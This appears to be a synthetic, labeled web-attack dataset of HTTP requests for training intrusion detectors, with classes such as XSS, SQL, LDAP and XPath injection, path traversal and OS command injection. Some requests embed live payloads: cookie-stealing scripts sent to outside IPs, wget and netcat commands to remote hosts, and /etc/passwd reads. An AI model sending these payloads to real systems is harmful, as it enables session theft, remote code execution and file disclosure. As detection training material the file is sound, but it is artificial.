GET /bLT5GowBlNERbp/n2eel/eadnebtehyasax/y50ikeeEssrrnGeroanc/aseaueVs/o.0/adminn8bhEcI/tRvk3D6GGexec/HemiBlzouju/KJ5like1JJd77bodyhavingando2/obW0yMLtvXWdZ.tAUH.cfm?lialt7otohebr=008604722&saAAom=mocha3&atameeemreju=edlxHN8yL&eS=0admin&is0resmnti=boot.ini%24&aHmkihneo43ate=160176081&oeRpeIfn0m=%3F%24so&44e2wvhno=%3Bqrinserty&Nm3kexnzs=3gd0dfdrna4a&vnlbierc=07&eknre0e=innaooSs%27+++++or++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++or++++%27rmre%27++++%3D+%27&ai9xuoeao=gevalo&tFs2wgetfO=587173&Bncncrma2aoh2oa=sE2 HTTP/1.0
Host: 125.167.153.141:80
Connection: keep-alive
Accept: video/mpeg;q=0.8, text/*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: h1rju=ictlhheb
Client-ip: 7.203.10.31
Cookie: oonEjnU=hhtpasseoeezwre;jNdexdotUzr=267656461
Cookie2: $Version="911"
Date: Fri, 25 Apr 08 04:00:36 CET
ETag: "E5Pz1BLK-9C3@Q7bcLV"
Expect: 100-continue
From: 92fxf@rrjet00.biz
If-Modified-Since: Mon, 12 Jun 06 10:24:00 CET
If-Unmodified-Since: Mon, 24 Sep 07 21:27:16 CET
If-Match: *
If-None-Match: "tGIjs1kdFx7bR6sSnsVx"
If-Range: "MrkoPHi._VhHKlilv"
Max-Forwards: 0599
MIME-Version: 7.9
Pragma: iuies=Oaero8y
Proxy-Authorization: NTLM b0NpaWVoZW1nbmU3aGVzcW5yaEZ0TG5pZW9lbnNlZ3Rub3JzZGhyQW5laDNsbg==
Authorization: 1ai4a behucoa=fsoig
Range: -628
Referer: http://www.ihdoeet.biz/eepL/ATlp0h/eltx/mgsrss/riCoonn.tiff
TE: deflate
Trailer: Date
User-Agent: Mozilla/4.9 (compatible; Knotlttmor; Win 9x; qc4thrtln)
UA-CPU: StrongARM
UA-Disp: 2354,727,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 353x220
Via: 3.1 www.csueht.png, 7.7 201.98.77.245, 8.1 www.sedtf.css:603
Transfer-Encoding: gzip
Upgrade: irn75/4.5, Aednh/6.2, trFh/5.3, nrkms/0.6
Warning: 502 253.96.14.29 "teeatydficcCyrvtey" "Thu, 06 Mar 08 12:20:53 GMT"
X-Forwarded-For: 159.181.91.193
X-Serial-Number: 312383203635
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49226
Start - Id: 46699
class: XSS
GET /lHrnsedY/aIstildteApk/o5eehtherwqpdo3/aO8z/sprdn3n3sDrq/NFb9/dieBppue0/c00YorRSVc2/rNLtP2@.8Z5LX8/9otigG9yggsh.bin?ecibeaiqcNey=nebrV&%u@Un1n.Ikz-z=+x&neTk6soaenennt=8inputunion4rseWhznuevarteM&ee7pOrewnsl=Oh%7Chtpasstas%25oas%5Cut HTTP/1.0
Host: 248.225.64.211
Connection: zrelTcin
Accept: audio/*;q=0.4, video/mpeg, image/jpeg;q=0.7
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.8
Accept-Language: ebi-acgoara;q=0.6, uj31ei-0sO;q=0.7, 5loael-msncx;q=0.2, Neonva-kcoooii, oau-aueFw
Cache-Control: max-age=83
Client-ip: 194.31.187.100
Cookie: pw=9DLR4Py_bm;oUacp=&<script >[window.open('http://154.107.225.65/tint.aspx'+document.cookie);]</script>
Cookie2: $Version="000"
Date: Thu, 21 Feb 08 07:24:54 CET
ETag: W/"brH8Xc_QOwh1tFEjJ175"
Expect: dsrtrDh=aewavr
From: sydmNoRr@eYicvet9.com
If-Modified-Since: Sun, 20 Apr 08 02:49:51 GMT
If-Unmodified-Since: Tue, 21 Jul 09 22:43:08 GMT
If-Match: "iWBRTxdiDG04m44KDJfT"
If-None-Match: *
If-Range: Thu, 01 Oct 09 12:40:13 GMT
Max-Forwards: 34
MIME-Version: 6.9
Pragma: on='tezaTih'
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest algorithm=cE8srfTv
Range: 4-54,2486-,676-7316
Referer: http://www.lfesgteu.uk/ossqc.php
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/6.1 (Windows; U; Win98 1.5; eO-tu; rv:8.6.2) Gecko/14353136
UA-Disp: 240,199,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 007x164
Via: 9.2 162.209.185.141, 8.5 www.tFnnee.css
Transfer-Encoding: deflate
Upgrade: oa7ner/6.8, tdsyot/0.1, lom/8.5
Warning: 905 www.seauzsf.jpeg "Tdiereitiwn54deIa" 
X-Forwarded-For: 254.88.178.244
X-Serial-Number: 9170068717
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46699
Start - Id: 37036
class: LdapInjection
GET /59eoDH1mIr6hTamt/lKPJs7r/KBaGXi3/ae4psdhm4irbl3ba3ujT/Wb8httpW./sdaIRtanrA1eaar5sly/zacreThssr.swf?LIr5fM@1=t&whtth1Otm5to=it%29%28%26%28objectClass+%3D++Rotn*%29 HTTP/1.1
Host: 45.210.19.62:1
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: txn='hecgpGe'
Client-ip: 55.15.65.177
Cookie: s5eghbd1=i;lmte=eN st0Ni[r?nNv;mnOhx.I4=88679
Cookie2: $Version="95"
Date: Fri, 01 Sep 06 10:27:28 CET
ETag: ".SThcMpKfONI8Cjdcf"
Expect: kodtt
From: ugo11f@oeeH7o.uk
If-Modified-Since: Sat, 16 Dec 06 18:54:11 GMT
If-Unmodified-Since: Tue, 09 Dec 08 04:53:48 UTC
If-Match: *
If-None-Match: "3HoswvUcy0hD4wB"
If-Range: Wed, 21 Oct 09 21:18:47 UTC
Max-Forwards: 1125
MIME-Version: 5.5
Pragma: qsj=vnrt
Proxy-Authorization: Digest opaque="isetlaxp"
Authorization: es8a5 huji3gye=lnxcuo
Range: -742236,5-8909,-634
Referer: http://www.uizSmm.cz/hopsnll/sQhnse/6ttOdrp.asp
TE: gzip,trailers,gzip
Trailer: Date
User-Agent: teitrsaceOlmesRn7l
UA-CPU: MIPS
UA-Disp: 2495,217,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9902x0663
Via: HTTP/6.0 124.140.210.216, 8.9 www.nbar3.shtml, 2.9 www.hutht6en.png
Transfer-Encoding: h4e2Oh; zotoikeu=rAgrxl
Upgrade: nopuat/4.5
Warning: 929 www.pogutin.htm "rmhurl" 
X-Forwarded-For: 164.143.217.25
X-Serial-Number: 4092233930
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37036
Start - Id: 37415
class: LdapInjection
GET /bavrQowdvpmtdt/48A5MGJVwsP/yh/IzFhb38aXmmbinSHB/a47pSzNmng8AyG2rzEl/eHo3hwat3oer/u0v2hk/utC9adticshfrv/r7Usam.shtml? HTTP/1.0
Host: www.slfowt.st:8430
Connection: leotR
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: deflate, deflate
Accept-Language: satoje-w, erbcne-aheJs, dOb7hsY-ebaSr1dE
Cache-Control: min-fresh=55511
Client-ip: 188.193.125.170
Cookie: de0clueNugtag=468)(&(objectClass=iwd)(|(sn    =eeas)(cn=ammm    J*));1SqvvarF=l\aarwnvart;za=1873;heo=4876
Cookie2: $Version="22"
Date: Thu, 15 Dec 05 09:47:00 GMT
ETag: "hykp_z-@oEb2W0RoC9fz"
Expect: 100-continue
From: alaHcor@ktljooA.cz
If-Modified-Since: Thu, 17 Mar 05 07:21:22 GMT
If-Unmodified-Since: Mon, 13 Jul 09 03:07:54 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 02 Nov 06 09:57:45 UTC
Max-Forwards: 1268
MIME-Version: 1.4
Pragma: tpstoc='n'
Proxy-Authorization: Digest cnonce="EOlts"
Authorization: NTLM ZGFoZDVjamhhNnRlaWVtaEVhZGVybGFzYldlaG5sczZnVDZlaW50YTho
Range: 747728-0693
Referer: /n9twne/EtaMtt/iwki8c/8e9eaqu.exe
TE: gzip,trailers,trailers
Trailer: TE
User-Agent: Mozilla/0.1 (X11; U; Unix 8.3; em-sE; rv:4.7.4) Gecko/83353261
UA-CPU: Sparc
UA-Disp: 143,2118,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 516x5876
Via: 9.7 www.et6ad.gif
Transfer-Encoding: compress
Upgrade: inCnt/4.0, wfn/1.0
Warning: 765 162.186.194.255:60063 "9jas9wzbnauexd" "Sun, 12 Oct 08 22:18:16 GMT"
X-Forwarded-For: 63.251.171.158
X-Serial-Number: 212738201929223
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37415
Start - Id: 39053
class: LdapInjection
POST /lWwGMCLwC/nynldchBerho/w5nletftiuarn/nmewbi4ae/nNJF5jh/ssk@/fA/he13i5utqoaqndwsusO.mdb? HTTP/1.0
Content-Length: 73
Content-Language: 3,g,iiqdtam2
Content-Encoding: compress
Content-Location: /snaz/eu8srhen/a1ufs.php
Content-MD5: cG5heGJ0d3I1ZGV0QTBveQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 04 Nov 08 16:47:54 UTC
Last-Modified: Fri, 26 Jun 09 09:46:25 UTC
Host: 69.129.95.195
Connection: close
Accept: application/postscript;q=0.6, image/jpeg;q=0.9
Accept-Charset: x-mac-korean, x-mac-ce, euc-kr, hz-gb-2312;q=0.0, macintosh;q=0.4
Accept-Encoding: *;q=0.5
Accept-Language: wn4rish-coi;q=0.0, kiba-m3dnnaee;q=0.9, hrrg-hoioMr;q=0.4
Cache-Control: only-if-cached
Client-ip: 95.187.156.44
Cookie2: $Version="03"
Date: Mon, 03 Oct 05 14:29:12 GMT
Expect: 8aodet=rdr0
From: 0q6i@uewa.fr
If-Modified-Since: Tue, 12 Oct 04 02:04:43 UTC
If-Unmodified-Since: Fri, 28 Aug 09 04:44:32 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 06 May 05 22:18:34 CET
Max-Forwards: 702
Proxy-Authorization: Hehvif be3afr=bsfs
Referer: /6uies/aiilslt/stsiUpt/8of5dt/4ghnsfjy.sh
TE: chunked;q=0.1,chunked;q=0.3
Trailer: Host
User-Agent: ) (  |    (6nt0t=hwa33*)
Via: HTTP/1.6 www.nnkt66iL.jpeg
Transfer-Encoding: identity
Upgrade: tiT/9.5
X-Serial-Number: 400559457

o2xtermUJa=N2e&uw=sgLzGNZ&2iaeet=h@bin$boot.iniaeu8y4be&6hbupt=dBG25w

End - Id: 39053
Start - Id: 35905
class: XPathInjection
POST /57NEcXDm8jRU80JUbBV/d_9VVZjDwXJd7/sLorAgTetnrttn/sjWPsM5rzEY6RbHcAXuw.bin? HTTP/1.1
Content-Length: 191
Content-Language: esr0,mrhtoStj,bidpem
Content-Encoding: gzip
Content-Location: http://oaaitai7.net/Vqhdvgda/thusgmH.jpeg
Content-MD5: ZWhheWRqYWl1NWxudVB4YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 27 Feb 07 17:39:09 UTC
Host: www.80lowdeorr.gov:08
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Cookie: mdt=yr(r8wtur;uabnjtscn=tLPHrq_Gs;EmQOtmp=amidOu'    or count(   path/child::node()[position()=((   i +   j    +  k +l  + 1)]    |     path/child::*()[position()=(k+1)])=1    or 'rlw'    = '  nrRoer'     or;oTakzn=026395070;sve=hsawly;Ire7sb=4c4t
ETag: W/"o-wGkfeDEpq_DWkLf"
If-Modified-Since: Tue, 12 Dec 06 21:28:50 CET
If-Range: Sat, 12 Aug 06 09:15:24 GMT
Max-Forwards: 3
MIME-Version: 8.3
Proxy-Authorization: Basic Z2R0ZzpmMXRydGg=
Authorization: Digest nc=8ACC8389
Referer: /sinaaIa/srtsce.jpeg
TE: trailers,chunked,chunked
User-Agent: Mozilla/2.0 (compatible; MSIE 1.1; Mac OS X; x2t5zp; rfeleNeaa)
Via: durv/7.6 190.185.116.184

isey=Easxkyperlat&@EPmetaTn2hZ77a=aeatlrh&cefcet8N=8139172&siHbsziwec=57700905&eMpbndN=dropasottaee&Q5ruixyiO55=yoi&4MgfIizierte=2&fsh=r&bbg8=echoos8etcuihomeOexecl&2znstxTTtbaoos=dmochaatyns

End - Id: 35905
Start - Id: 45042
class: PathTransversal
PUT /em9S7d/mttlhpweSrl9Ggrr/rhtaccesPC01FOhtaccese4vbscriptTy/iLRD7/srnaSsroqa/ltg@@iQ-/sonzplmbbconv/x-88byg-khzjOKTggU/aUtuEinwckth7tl3.css? HTTP/1.1
Content-Length: 192
Content-Language: r
Content-Encoding: deflate
Content-Location: http://hftgai.gov/hROvN/EaaE.asp
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 06 Jan 10 07:27:24 UTC
Host: www.ejggdroarn.org
Connection: eabjskb
Accept: audio/x-wav;q=0.1
Accept-Charset: windows-1252, x-mac-korean
Accept-Encoding: *
Accept-Language: dleit-b4mnr, ca3URi-lt6rae;q=0.9, athu8t-o1eeoipr, i2fr0oa-a5zs;q=0.2
Cache-Control: n6nle=i
Cookie: kmxitloslVelu3b=ishoUndaeAtf;Eerhedew2daMRzi=sIoYKah5;udmogWbItSgugg=813694;0zoncNhmdtqyhi3=file:///g:/fb/64I/ertenst.xml;neRirbroete=jRBR
Cookie2: $Version="417"
Date: Sun, 13 Feb 05 24:56:44 UTC
From: scvAet@hgiamatrfo.org
If-Unmodified-Since: Fri, 05 Nov 04 18:36:45 GMT
If-Range: Mon, 12 Sep 05 13:05:03 CET
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Basic dGVyZXQ6ZWRiYTlt
Referer: http://www.NseY.it/Utha7t/eapdoeIy/spano3cy/rfse.mpg
User-Agent: Mozilla/9.4 (Windows; U; Windows NT 1.3; ba-mh; rv:8.1.0) Gecko/31682905
Via: 2.3 155.184.237.122

pd=70542222&Scbmtpom=3599325&bh=htin&wu0oheTeon8slaE=srp&oi4ni=;%0 &uth=D$io&ghm=indsUsubt&mhtr=lxcint&o7WLlQdwjV=t6VSP@JQ&Itstbonetnece=3155512&pK..4xp_XV=stdineut&N1i4hgpnretsM=76698

End - Id: 45042
Start - Id: 49467
class: XPathInjection
GET /Jsehq5.cfm?Tn=8&nRAOeS3E=8&ca=crn&05fdABWW=tsike&paxtv=lahntlwce3nscriptrt&rcilzethv=mcesnoor%27++or+++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+or++%27oedj6%27++%3D%27 HTTP/1.1
Host: 84.159.230.88
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.5
Accept-Encoding: compress;q=0.5, identity, identity;q=0.0, identity
Accept-Language: eeaesn-toN, Hs-drns, exZsed-aS
Cache-Control: min-fresh=0
Client-ip: 200.92.12.13
Cookie: eJissn=3508248;bwtui=Gph
Cookie2: $Version="182"
Date: Thu, 15 Jul 04 06:29:25 UTC
ETag: "SmZqfMrAN90WPwXEG8YZ"
Expect: uahda
From: 8tns@scEoyunm.org
If-Modified-Since: Tue, 25 May 04 19:26:20 GMT
If-Unmodified-Since: Tue, 01 Jun 04 20:43:53 CET
If-Match: "97dzoUvuRXX7Orh"
If-None-Match: *
If-Range: "L2_eRyjXKIW6hbHqV5"
Max-Forwards: 73
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: ledega 1phesBu=nKn6nse
Authorization: Digest uri=http://www.sauLhr.st/um6stglg/w1aaLoe/blons/Tdoty/o9ao60t.jpeg
Range: -012
Referer: /lLn8k/teQ774/oAsMadnt/e4tXodBT.gz
TE: trailers
Trailer: Cache-Control
User-Agent: t3I7iq http://www.Beee.fr
UA-CPU: PowerPC
UA-Disp: 198,205,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 527x1451
Via: 1.1 www.ars68hi.html, 7.1 36.237.244.148, 6.7 90.136.18.23:9475
Transfer-Encoding: deflate
Upgrade: nueei/2.7, enf/8.5
Warning: 954 24.212.70.104:77 "gmis" 
X-Forwarded-For: 64.1.22.247
X-Serial-Number: 008046
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49467
Start - Id: 47248
class: XSS
GET /5eefttaEaetNhGi8s/mfpeN5ehseaheh1eti/sr2ddo0me2h8/sjWZND5/arCrdyoirhg5eaz/m@nngbh@P/aS/trmuttoeah9/4eeecflrcierte/tH8.htm?eNvtdeeeD7gcs3n=4&ncrtE=4305659064&37i=%26%7B%5Bwindow.open%28%27http%3A%2F%2F1.229.103.28%2Fchmeri.bin%27%2Bdocument.cookie%29%3B%5D%7D%3B HTTP/1.0
Host: 178.95.204.121:80
Connection: gog1e2rr
Accept: application/*
Accept-Charset: windows-1257, x-mac-greek
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-stale=35
Client-ip: 19.118.218.108
Cookie: 2o2tmerAhO=914;al8U=dglam|home3dlfeO99
Cookie2: $Version="66"
Date: Mon, 29 Jan 07 11:57:21 UTC
ETag: "WAB5@Z.yDarnU0JFvhk"
Expect: 100-continue
From: eeTaCo@mVlE3nKhn.biz
If-Modified-Since: Tue, 24 Nov 09 19:24:42 CET
If-Unmodified-Since: Wed, 20 Oct 04 16:03:54 UTC
If-Match: *
If-None-Match: *
If-Range: "p3.BQaZCl7N6PhYI"
Max-Forwards: 57
MIME-Version: 3.6
Pragma: hoy=ro
Proxy-Authorization: 6ndit medexEq=belmLsj
Authorization: Digest nonce
Range: -88
Referer: http://www.jr0ea1.ch/r0ess9qW/reOls/oa2rut/1Q5naf/edilckxe.mpg
TE: trailers,trailers,gzip
Trailer: Accept-Language
User-Agent: Mozilla/9.4 (compatible; Konqueror/1.0; Windows NT; o49oflwom)
UA-CPU: 68000
UA-Disp: 390,072,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 077x3740
Via: FTP/5.0 221.126.41.180, FTP/9.4 200.237.197.41
Transfer-Encoding: compress
Upgrade: ebpgud/5.5, uo6ys/3.0, eeei/3.0, wOU/7.9
Warning: 231 178.152.9.49 "iem9a" "Sat, 05 Jul 08 14:59:50 GMT"
X-Forwarded-For: 29.33.63.135
X-Serial-Number: 15152704800
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47248
Start - Id: 46271
class: PathTransversal
GET /bdehzectxI/L@zgmh966PIE6/trmenbetnlto/iO9E9YHgbInApsamV/eurisasnCm/SZDqxnph-O.dqwV6iQ/iahIs/ahraeiNamndcdtynw9ee/44IflWMB.tiff?oe=7500&ofiemws5ihtisz=%2Fetc%2Fpasswd&yupttd=o%2F&fe=494&Rac=n5motecyhwy&pdnch=0349596876&wn9jsFXEop=oEL&home53ls8G2=dlen&TiiAsolen3=lhyk3wo&lreth=9eOk%40%27p2%24p&s3tals3lkh=22978 HTTP/1.0
Host: www.dEceog.ch:80
Connection: close
Accept: */*;q=0.1
Accept-Charset: x-mac-korean
Accept-Encoding: *;q=0.8
Accept-Language: sieiEt-eapeT, vfatw6u-je;q=0.7
Cache-Control: no-cache
Client-ip: 117.131.231.99
Cookie: kedEl=e~;te=tto;60iarnxblit6efs=apw
Cookie2: $Version="289"
Date: Wed, 09 Jun 04 14:35:49 CET
ETag: W/"zjbRV5pdy3nxjAnt"
Expect: 100-continue
From: o8nret@EbsFqo4s.st
If-Modified-Since: Sat, 18 Jul 09 09:43:05 CET
If-Unmodified-Since: Tue, 02 Mar 10 04:14:51 GMT
If-Match: *
If-None-Match: "54kfeWJLFiYYWtUP2f"
If-Range: *
Max-Forwards: 1
MIME-Version: 8.9
Pragma: r3i='t7ropP'
Proxy-Authorization: NTLM eXJRM2xlZHJodDRlMmtnN3dyYWV0ZWd1YWVxaWFFdmcxZWVlb2xpc2Fv
Authorization: Digest uri=http://jnnte.ch/cre5lhut/onigo/0t2iftsi/AfeeT.mpeg
Range: -99,17-4389
Referer: http://rsnifsht.gov/uRst7ri/iEalcmr/Sqjeo/optmsoa/wotttra.jpeg
TE: gzip;q=0.8,chunked,chunked;q=0.0
Trailer: If-Modified-Since
User-Agent: Mozilla/3.1 (X11; U; Open BSD i586 2.5; ea-ah; rv:8.8.3) Gecko/65763082
UA-CPU: PowerPC
UA-Disp: 542,0115,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 5939x660
Via: HTTP/0.2 www.sRNsgg.html, ujfcs/2.6 www.sqyen.shtml, 7.3 www.8edleuoe.css:4
Transfer-Encoding: gzip
Upgrade: Su9qj/8.6, baec/7.2
Warning: 013 22.194.211.11 "8iCne9m5iQhhsaHen19e" 
X-Forwarded-For: 196.41.114.153
X-Serial-Number: 1060683
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46271
Start - Id: 45925
class: PathTransversal
GET /emetbahlqseusnaopt/e04GM0cl/nwe_r0l.W1e/mT/dz8.php?edaeNidbe3erdm=%5Cautoexec.bat HTTP/1.1
Host: 172.101.121.192
Connection: e6eqh
Accept: video/*;q=0.1, video/*, audio/*
Accept-Charset: iso-8859-5, euc-jp;q=0.4, x-mac-chinesetrad, x-mac-chinesesimp
Accept-Encoding: gzip;q=0.6, compress;q=0.0, identity;q=0.0
Accept-Language: *;q=0.4
Cache-Control: min-fresh=7362
Client-ip: 118.175.221.245
Cookie: 2dnaFOeessxu0E=r4D-J1-Obmu@;Tldocumentv-kDbgsound@j=yu;nstyley;sEDl1eerpihn0=t8TN_
Cookie2: $Version="3"
Date: Sat, 18 Jul 09 07:14:59 UTC
ETag: "1MT.AVtNT_x-4Gm"
Expect: 100-continue
From: leat@aeegln9ow.cz
If-Modified-Since: Sat, 26 Dec 09 08:48:54 CET
If-Unmodified-Since: Thu, 08 Nov 07 14:43:46 GMT
If-Match: *
If-None-Match: "ZbHgGvpNTxCkWcx-"
If-Range: Wed, 12 Oct 05 02:05:20 GMT
Max-Forwards: 4
MIME-Version: 7.1
Pragma: si0p8=tstx9N
Proxy-Authorization: NTLM aGFhMWFwaHJtTmx0ckVuOGlpZWRucmFnZXMyTG0wM3QxRQ==
Authorization: Basic b2Flb3JiOkRnZGE5bg==
Range: 434-766527,-7
Referer: http://drdee.it/mjteid/wouiht.pl
TE: chunked;q=0.6,deflate;q=0.8
Trailer: Max-Forwards
User-Agent: Mozilla/5.1 (compatible; MSIE 5.0; Solaris; fx7asslm)
UA-CPU: 68000
UA-Disp: 1794,840,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 880x5284
Via: 7.9 65.143.242.95
Transfer-Encoding: deflate
Upgrade: dhvol/0.8, Pde/4.9
Warning: 039 www.rwdtitz.jpeg "i8opqaZazoijrn" "Fri, 21 Apr 06 07:33:49 UTC"
X-Forwarded-For: 210.181.84.191
X-Serial-Number: 715330032292
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45925
Start - Id: 42061
class: SqlInjection
GET /n3/29u.cfm?Sy4acorul=o0ae&sUs1t58hxyst=90076249&ivieatvh=autoexec&bV8Y4PL=%27+AND+USER_NAME%28%29%3D%27fyg HTTP/1.0
Host: www.uEaNe.org
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-6;q=0.4, windows-874, x-mac-chinesetrad;q=0.6, x-mac-korean;q=0.3, x-mac-turkish
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-cache
Client-ip: 154.191.132.233
Cookie: 8IRoptAcZq=%apc
Cookie2: $Version="58"
Date: Thu, 01 Apr 10 17:50:57 CET
ETag: W/"0OzoIBhLz0TEHDP7"
Expect: afn8ot
From: lhrrhh9j@48Flats.biz
If-Modified-Since: Fri, 05 Jan 07 07:27:18 GMT
If-Unmodified-Since: Mon, 11 Jun 07 20:53:00 UTC
If-Match: "4hCvlIJLLlFBBBJ"
If-None-Match: *
If-Range: "w5RYOz85gXktcR8g"
Max-Forwards: 3607
MIME-Version: 0.9
Pragma: b='obv'
Proxy-Authorization: Basic c3VubzpuZWdhZA==
Authorization: Basic aWN5NXA6VWVFaG50aHI=
Range: -99729
Referer: /hnsVdat/sgfO.js
TE: deflate,trailers,trailers
Trailer: Range
User-Agent: Mozilla/5.0 (X11; U; Unix 4.7; be-oe; rv:7.7.3) Gecko/66977139
UA-CPU: Sparc
UA-Disp: 7502,392,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9544x100
Via: 9.8 150.228.124.21:5337, HTTP/1.6 www.emooteM.png
Transfer-Encoding: compress
Upgrade: Ens/2.7, ieoa/3.9, 4tt/2.8, ind/4.0, sute/1.0
Warning: 264 99.10.30.250 "a0gtsj1ecytcw5Eqrc" 
X-Forwarded-For: 206.224.167.230
X-Serial-Number: 001394948859071824
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 42061
Start - Id: 36742
class: OsCommanding
GET /y2or/r_GUyqZ/xTY.dll?ug7eldlnltnotei=3+%27&otzsha=nGOfgZyg&kMxzJCnA=kmeEl&beuIhnepfanc=+4%3CM%7Eev%26&dI8sgevh=%28kw&eT=rZwJY-os5&e7oS3tinera8=elont9ymi&lnenEoe=hGf_%40wB4zVX&cehtecs4a=%5Cnwget++++http%3A%2F%2F137.245.163.93%3A462%2Fnftp.exe&s9rdE6h=ecprocessing-instruction HTTP/1.0
Host: 41.208.96.210
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: min-fresh=62
Client-ip: 114.229.84.195
Cookie: pejwwsnroiti6e=itshecalr5xtermtedocument;GVuhmocha=0;utodhtxibntotoe=guss
Cookie2: $Version="70"
Date: Fri, 14 Aug 09 21:14:27 UTC
ETag: "Pj4xEi@aI3WQBD3"
Expect: iuowlu=arrod;at3irEyt=cnoiy
From: 9rrtotci@rtshul.org
If-Modified-Since: Sun, 21 Mar 10 09:40:02 GMT
If-Unmodified-Since: Thu, 06 Sep 07 22:04:30 CET
If-Match: "Bzp4oCgH-jAMrEt"
If-None-Match: "jCQ.nuPqlOxdDxD"
If-Range: Sat, 03 Apr 10 16:44:27 GMT
Max-Forwards: 5
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: Digest algorithm=Rrf1lpt
Authorization: Digest response="6eAEeC1c77C470AcDca6aE6CaA0D1D4f"
Range: 87-896750,1933-,495454-79783
Referer: /eDrPtmt/areEsM/6ayunkst/ONmt.jsp
TE: gzip;q=0.2
Trailer: From
User-Agent: Mozilla/8.9 (Windows; U; Win 9x 5.3; 4j-e5; rv:3.1.7) Gecko/43888584
UA-CPU: Sparc
UA-Disp: 944,674,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 1003x5848
Via: HTTP/8.0 45.115.3.82, 2.5 119.233.203.28:4850
Transfer-Encoding: Derern
Upgrade: evenU/1.9, Quheec/0.8, sieT/8.6, e9Rslt/7.3, iZner/9.0
Warning: 867 151.26.59.212 "etraSdoEtTi83ctsms0" 
X-Forwarded-For: 4.110.8.55
X-Serial-Number: 5966336
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36742
Start - Id: 43431
class: OsCommanding
GET /uJ2EElM1._J_yH/i9pfuHi/srS9eQCyR/npo/wKOTZKzzcifRdmQy@GE/bFxH7X9t8tyRN9I/taXvj/thgtettp7sfubaes2/uUrd3Vp97LWz4P/pFQ.htm?oeeimfun98tmsss=varinputb&osh=eV5i%2Blit&TalthPEe=%7C+++++%2Fusr%2Fbin%2Fnc+++++-vvv+++150.227.121.166+++++80%2500 HTTP/1.0
Host: 144.180.91.251:80
Connection: keep-alive
Accept: text/xml, text/*
Accept-Charset: windows-1252, x-mac-turkish, x-mac-arabic;q=0.8, x-mac-greek
Accept-Encoding: deflate;q=0.6, deflate;q=0.7, gzip;q=0.9, compress, identity;q=0.9
Accept-Language: *;q=0.1
Cache-Control: max-age=6510
Client-ip: 230.11.35.165
Cookie: us0t4nR5goo=12263337;soohEale9Hee=%(rc0aIolo9;o?d;zoh=wiem
Cookie2: $Version="368"
Date: Fri, 08 Feb 08 22:58:17 GMT
ETag: "LXuX1YfEDWDYmg@8e"
Expect: 100-continue
From: satt@ee2io.st
If-Modified-Since: Sat, 16 Feb 08 10:30:36 GMT
If-Unmodified-Since: Mon, 18 Aug 08 05:48:37 GMT
If-Match: "kiqglVPP@sCFdFE-"
If-None-Match: *
If-Range: "8ZJQB2gVMwuCevYU_vyg"
Max-Forwards: 9641
MIME-Version: 7.3
Pragma: csirt4un=ace
Proxy-Authorization: NTLM dDJvZWVyaElzaXJjaDllZW9vbHdxYXR0a2tucmExbmNhaW5kYVJl
Authorization: NTLM dWgybmV4YTZrckFPQXFoY29mTm9laGhsdU50OXduZHZodFpFdFRz
Range: 5130-,89497-47998,93-50140
Referer: http://rnsyo.uk/ranqrhr/itcan/iielmo.jpg
TE: deflate,trailers
Trailer: Transfer-Encoding
User-Agent: acsrI/4.4
UA-CPU: PowerPC
UA-Disp: 2710,0982,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 319x516
Via: uwatc/0.4 www.le8sodo.html
Transfer-Encoding: compress
Upgrade: Oed/2.9
